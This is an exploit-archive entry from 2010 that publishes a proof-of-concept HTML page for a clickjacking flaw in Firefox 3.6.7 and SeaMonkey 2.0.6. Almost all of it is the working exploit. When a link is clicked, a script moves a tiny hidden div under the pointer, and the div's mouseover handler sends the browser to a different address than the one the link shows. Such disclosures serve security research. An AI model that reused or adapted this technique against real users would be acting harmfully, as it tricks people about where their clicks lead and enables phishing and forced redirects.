Clickjacking Web Browser Multiple Vulnerability (FF3.6.7/SM 2.0.6)

2010-07-23T00:00:00
ID 1337DAY-ID-13447
Type zdt
Reporter BARCOD3
Modified 2010-07-23T00:00:00

Description

Exploit for windows platform in category remote exploits

                                        
                                            ==================================================================
Clickjacking Web Browser Multiple Vulnerability (FF3.6.7/SM 2.0.6)
==================================================================


<html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>FF3.6.7/SM 2.0.6 ClickJacking Vulnerability</title>
</head><body>
 
<div id="mydiv" onmouseover="document.location='http://www.mozilla.org';" style="border: 0px none ; background: rgb(0, 0, 0) none repeat scroll 0% 0%; position: absolute; width: 2px; height: 2px; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"></div>
<script>
function clickjack_armor(evt)
{
    clickjack_mouseX=evt.pageX?evt.pageX:evt.clientX;
    clickjack_mouseY=evt.pageY?evt.pageY:evt.clientY;
    document.getElementById('mydiv').style.left=clickjack_mouseX-1;
    document.getElementById('mydiv').style.top=clickjack_mouseY-1;
}
</script>
<center>
<br>
<center><h1><font face="Calibri">Firefox 3.6.7 / SeaMonkey 2.0.6 Clickjacking Vulnerability</font></h1>
 <p> </p>
<div style="border-top-style: solid; border-top-width: 1px; padding-top: 1px">
    <b><br><br>
 
    <a href="http://www.Securitylab.ir" onclick="clickjack_armor(event)"> Go
    to the http://www.Securitylab.ir : (http://www.mozilla.org)</a></b></div>
<div style="border-bottom-style: solid; border-bottom-width: 1px; padding-bottom: 1px">
 <p> </div>
<p> </p>
</center>
<div style="border-top-style: solid; border-top-width: 1px; border-bottom-style: solid; border-bottom-width: 1px; padding-top: 1px; padding-bottom: 1px">
    <b><font face="Calibri">Pouya Daneshmand, Securitylab.ir</font></b></div>
 
</center></body></html>



#  0day.today [2018-04-09]  #